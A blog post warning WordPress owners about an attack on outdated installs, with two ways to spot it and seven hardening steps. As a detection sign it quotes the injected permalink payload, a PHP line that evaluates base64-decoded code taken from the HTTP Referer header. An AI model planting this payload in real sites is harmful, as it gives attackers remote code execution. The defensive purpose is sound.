Since last two days many WordPress bloggers have reported the hacking attacks on their blogs. WordPress hackers have targeted old versions of WordPress blogs, which are easily vulnerable to such malicious attacks.
These attacks are increasing very quickly among the WordPress users and now time has come to take some precautionary steps. If you don’t take immediate actions on your blog then get ready to lose all your data.
How to find whether your blog has been attacked?
It’s very simple to detect this recent WordPress attack. Check your blog’s permalink structure. If your blog is under attack, you’ll find following unusual code in permalink structure.
http://www.your_blog_name.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/.
There is another way you can detect this severe attack. Go to WordPress Dashboard and check the names of users. It’s possible that you may find some unexpected users registered on the blog. If this is the case, your blog has been attacked by hackers.
These are the only two methods to find out the hacking attack. Go through your blog’s settings and if you find anything suspicious, take quick actions.
7 Simple Ways to protect your blog from WordPress Attack
Okay, now you know that your blog is not attacked by attackers. So, it’s time to make it safe from future attacks. Check out the following important steps to secure your WordPress blog.
1. Update WordPress
This is the first and major step to keep your blog clean and immune. Update your blog to latest WP version, WordPress 2.8.4. You can also download it from here -
http://wordpress.org/download/
As I said earlier, older versions of WordPress are the main victims. So, it’s very important to keep your blog updated.
2. Update WordPress Plugins
Although WordPress plugins are not the reason behind these attacks, just keep them updated to newer versions. If you find any plugin is not compatible with WordPress 2.8.4, deactivate it and remove it completely from your blog. Report the errors to plugin’s owner. Such plugins might give you trouble in long term.
3. Change Passwords
It’s one of the best techniques to keep your blog away from such attacks. Change all the passwords of your blog including FTP accounts, SQL databases, Email accounts related to your blog etc. Don’t keep same password to all accounts. Password should be a good combination of characters and numbers. Make it as complicated as possible.
4. Delete Users
If you’ve any inactive user account on your blog, delete it and transfer its data to your account. Don’t keep useless accounts on your blog.
Also, don’t keep default WordPress username “admin” as an administrator of your blog. Create a new user with admin rights and delete the default account.
5. Set the Priority and Role of User
If you’ve multiple authors on your blog, don’t give administrator rights to everyone. Set their role as “Author” or “Editor”.
As shown in image, uncheck the “Membership” option and set new user default role as “Subscriber”.
6. Check Permalink Settings
As these attacks are basically affecting the permalink structures of blogs, make sure your permalink settings are appropriate. You can check it from this path -
WordPress Dashboard >> Settings >> Permalinks
7. Backup your blog
Always keep the backup of your blog and make sure it doesn’t contain any malicious script. Save the backup file on your hard drive, don’t store it on hosting server.
One more important thing, keep a separate folder of your blog theme on computer. It’ll help you save lots of work and time during new WordPress installation.
Prevention is always better than cure! So, follow all above mentioned steps to protect your blog from hacker attacks. If you know any other easy way to avoid attacks or have any doubt regarding these attacks, please let me know via comments below.